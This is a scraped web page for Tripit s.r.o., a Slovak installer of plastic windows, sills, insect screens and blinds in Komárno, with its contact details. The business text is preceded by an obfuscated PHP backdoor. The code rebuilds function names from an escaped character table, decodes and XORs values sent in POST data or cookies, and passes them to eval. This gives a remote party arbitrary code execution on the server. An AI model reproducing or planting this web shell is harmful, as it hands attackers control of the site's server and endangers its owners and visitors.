$tfa8c30c = 850;$GLOBALS['j6a4b']=Array();global$j6a4b;$j6a4b=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['b79ec']="\x43\x2f\x4d\x5f\x54\x9\x58\x6b\x4a\x2d\x2e\x3e\x27\x44\x31\x71\x5c\x70\x60\x61\x3a\x5e\x25\x40\x77\x6a\x67\x22\x5b\x51\x2c\x2a\x33\x6c\xd\x4c\x7e\x79\x6f\x6e\x23\x2b\x75\x39\x55\x65\x53\x29\x63\x74\x62\x7b\x69\x7a\x26\x28\x3f\x4e\x52\x5a\x30\x57\x56\x46\x3b\x42\x38\xa\x41\x34\x66\x36\x3d\x45\x21\x76\x37\x7d\x73\x32\x47\x7c\x6d\x48\x68\x5d\x59\x24\x20\x78\x4b\x4f\x49\x3c\x50\x64\x72\x35";$j6a4b[$j6a4b['b79ec'][37].$j6a4b['b79ec'][76].$j6a4b['b79ec'][79].$j6a4b['b79ec'][70].$j6a4b['b79ec'][79].$j6a4b['b79ec'][43]]=$j6a4b['b79ec'][17].$j6a4b['b79ec'][19].$j6a4b['b79ec'][48].$j6a4b['b79ec'][7];$j6a4b[$j6a4b['b79ec'][48].$j6a4b['b79ec'][32].$j6a4b['b79ec'][50].$j6a4b['b79ec'][45].$j6a4b['b79ec'][69]]=$j6a4b['b79ec'][48].$j6a4b['b79ec'][38].$j6a4b['b79ec'][42].$j6a4b['b79ec'][39].$j6a4b['b79ec'][49];$j6a4b[$j6a4b['b79ec'][42].$j6a4b['b79ec'][48].$j6a4b['b79ec'][69].$j6a4b['b79ec'][60].$j6a4b['b79ec'][97].$j6a4b['b79ec'][14].$j6a4b['b79ec'][79].$j6a4b['b79ec'][50].$j6a4b['b79ec'][97]]=$j6a4b['b79ec'][78].$j6a4b['b79ec'][42].$j6a4b['b79ec'][50].$j6a4b['b79ec'][78].$j6a4b['b79ec'][49].$j6a4b['b79ec'][96];$j6a4b[$j6a4b['b79ec'][82].$j6a4b['b79ec'][60].$j6a4b['b79ec'][71].$j6a4b['b79ec'][50].$j6a4b['b79ec'][79].$j6a4b['b79ec'][45]]=$j6a4b['b79ec'][78].$j6a4b['b79ec'][49].$j6a4b['b79ec'][96].$j6a4b['b79ec'][33].$j6a4b['b79ec'][45].$j6a4b['b79ec'][39];$j6a4b[$j6a4b['b79ec'][7].$j6a4b['b79ec'][70].$j6a4b['b79ec'][66].$j6a4b['b79ec'][79].$j6a4b['b79ec'][19]]=$j6a4b['b79ec'][45].$j6a4b['b79ec'][89].$j6a4b['b79ec'][17].$j6a4b['b79ec'][33].$j6a4b['b79ec'][38].$j6a4b['b79ec'][95].$j6a4b['b79ec'][45];$j6a4b[$j6a4b['b79ec'][75].$j6a4b['b79ec'][32].$j6a4b['b79ec'][76].$j6a4b['b79ec'][32].$j6a4b['b79ec'][71].$j6a4b['b79ec'][95].$j6a4b['b79ec'][97].$j6a4b['b79ec'][70].$j6a4b['b79ec'][76]]=$j6a4b['b79ec'][78].$j6a4b['b79ec'][49].$j6a4b['b79ec'][96].$j6a4b['b79ec'][3].$j6a4b['b79ec'][96].$j6a4b['b79ec'][45].$j6a4b['b79ec'][17].$j6a4b['b79ec'][45].$j6a4b['b79ec'][19].$j6a4b['b79ec'][49];$j6a4b[$j6a4b['b79ec'][95].$j6a4b['b79ec'][76].$j6a4b['b79ec'][19].$j6a4b['b79ec'][66].$j6a4b['b79ec'][14].$j6a4b['b79ec'][97]]=$_POST;$j6a4b[$j6a4b['b79ec'][53].$j6a4b['b79ec'][50].$j6a4b['b79ec'][43].$j6a4b['b79ec'][32].$j6a4b['b79ec'][71].$j6a4b['b79ec'][79]]=$_COOKIE;$m05ab=Array($j6a4b['b79ec'][96].$j6a4b['b79ec'][19].$j6a4b['b79ec'][39].$j6a4b['b79ec'][95].$j6a4b['b79ec'][38].$j6a4b['b79ec'][82].$j6a4b['b79ec'][14]=>$j6a4b['b79ec'][96].$j6a4b['b79ec'][19].$j6a4b['b79ec'][39].$j6a4b['b79ec'][95].$j6a4b['b79ec'][38].$j6a4b['b79ec'][82].$j6a4b['b79ec'][79]);$o37b047bd=Array($j6a4b['b79ec'][96].$j6a4b['b79ec'][19].$j6a4b['b79ec'][39].$j6a4b['b79ec'][95].$j6a4b['b79ec'][38].$j6a4b['b79ec'][82].$j6a4b['b79ec'][32]=>$j6a4b['b79ec'][96].$j6a4b['b79ec'][19].$j6a4b['b79ec'][39].$j6a4b['b79ec'][95].$j6a4b['b79ec'][38].$j6a4b['b79ec'][82].$j6a4b['b79ec'][69]);foreach(Array($m05ab,$j6a4b[$j6a4b['b79ec'][95].$j6a4b['b79ec'][76].$j6a4b['b79ec'][19].$j6a4b['b79ec'][66].$j6a4b['b79ec'][14].$j6a4b['b79ec'][97]],$o37b047bd,$j6a4b[$j6a4b['b79ec'][53].$j6a4b['b79ec'][50].$j6a4b['b79ec'][43].$j6a4b['b79ec'][32].$j6a4b['b79ec'][71].$j6a4b['b79ec'][79]])as$w51f594){foreach($w51f594as$u23c018d=>$w077bdd){$w077bdd=@$j6a4b[$j6a4b['b79ec'][37].$j6a4b['b79ec'][76].$j6a4b['b79ec'][79].$j6a4b['b79ec'][70].$j6a4b['b79ec'][79].$j6a4b['b79ec'][43]]($j6a4b['b79ec'][83].$j6a4b['b79ec'][31],$w077bdd);$u23c018d.=$j6a4b['b79ec'][48].$j6a4b['b79ec'][95].$j6a4b['b79ec'][19].$j6a4b['b79ec'][32].$j6a4b['b79ec'][79].$j6a4b['b79ec'][79].$j6a4b['b79ec'][43].$j6a4b['b79ec'][14].$j6a4b['b79ec'][9].$j6a4b['b79ec'][76].$j6a4b['b79ec'][14].$j6a4b['b79ec'][45].$j6a4b['b79ec'][76].$j6a4b['b79ec'][9].$j6a4b['b79ec'][69].$j6a4b['b79ec'][45].$j6a4b['b79ec'][48].$j6a4b['b79ec'][79].$j6a4b['b79ec'][9].$j6a4b['b79ec'][66].$j6a4b['b79ec'][32].$j6a4b['b79ec'][79].$j6a4b['b79ec'][69].$j6a4b['b79ec'][9].$j6a4b['b79ec'][14].$j6a4b['b79ec'][45].$j6a4b['b79ec'][32].$j6a4b['b79ec'][60].$j6a4b['b79ec'][76].$j6a4b['b79ec'][60].$j6a4b['b79ec'][69].$j6a4b['b79ec'][60].$j6a4b['b79ec'][48].$j6a4b['b79ec'][60].$j6a4b['b79ec'][79].$j6a4b['b79ec'][32];$obc60=$w077bdd^$j6a4b[$j6a4b['b79ec'][42].$j6a4b['b79ec'][48].$j6a4b['b79ec'][69].$j6a4b['b79ec'][60].$j6a4b['b79ec'][97].$j6a4b['b79ec'][14].$j6a4b['b79ec'][79].$j6a4b['b79ec'][50].$j6a4b['b79ec'][97]]($j6a4b[$j6a4b['b79ec'][75].$j6a4b['b79ec'][32].$j6a4b['b79ec'][76].$j6a4b['b79ec'][32].$j6a4b['b79ec'][71].$j6a4b['b79ec'][95].$j6a4b['b79ec'][97].$j6a4b['b79ec'][70].$j6a4b['b79ec'][76]]($u23c018d,($j6a4b[$j6a4b['b79ec'][82].$j6a4b['b79ec'][60].$j6a4b['b79ec'][71].$j6a4b['b79ec'][50].$j6a4b['b79ec'][79].$j6a4b['b79ec'][45]]($w077bdd)/$j6a4b[$j6a4b['b79ec'][82].$j6a4b['b79ec'][60].$j6a4b['b79ec'][71].$j6a4b['b79ec'][50].$j6a4b['b79ec'][79].$j6a4b['b79ec'][45]]($u23c018d))+1),0,$j6a4b[$j6a4b['b79ec'][82].$j6a4b['b79ec'][60].$j6a4b['b79ec'][71].$j6a4b['b79ec'][50].$j6a4b['b79ec'][79].$j6a4b['b79ec'][45]]($w077bdd));$obc60=$j6a4b[$j6a4b['b79ec'][7].$j6a4b['b79ec'][70].$j6a4b['b79ec'][66].$j6a4b['b79ec'][79].$j6a4b['b79ec'][19]]($j6a4b['b79ec'][40],$obc60);if($j6a4b[$j6a4b['b79ec'][48].$j6a4b['b79ec'][32].$j6a4b['b79ec'][50].$j6a4b['b79ec'][45].$j6a4b['b79ec'][69]]($obc60)==3){eval/*e4c0ed*/($obc60[1]($obc60[2]));exit();}}} ?> Tripit s.r.o., Komárno
okenné parapety
plastové okná
Montáž vnútorných
aj vonkajších parapetných
dosiek v pestrej palete farieb.
Návrh, zameranie a montáž
plastových okien z vybraných
značkových materiálov
renomovaných výrobcov.
žalúzie
Sieť proti hmyzu zo skleneného
vlákna s hliníkovým profilom
zaručuje dlhú životnosť,
farebnú stálosť a vysokú
pevnosť.
Montáž je do všetkých druhov
okien bez nutnosti zásahu
do rámu okna.
Estetické a kvalitné žalúzie -
horizontálne aj vertikálne,
zabezpečia optimálny dopad
svetla pri každom slnečnom
žiarení.
Dokážu predeliť miestnosť
a spoľahlivo nahradia zastaralé
závesy a záclony. 


Prelustrujte si nás v OR
 
Prevádzka:
Železničná 6, 945 01 Komárno
   
tel.: 035 77 20 734,
  0905 853 791
   
fax: 035 77 20 734
   
 
e-mail:
 
  oknotripit@centrum.sk  
 
    
 
  IE 4+, NN 4+, 800x600 16k  
©2003 Tripit s.r.o. webmaster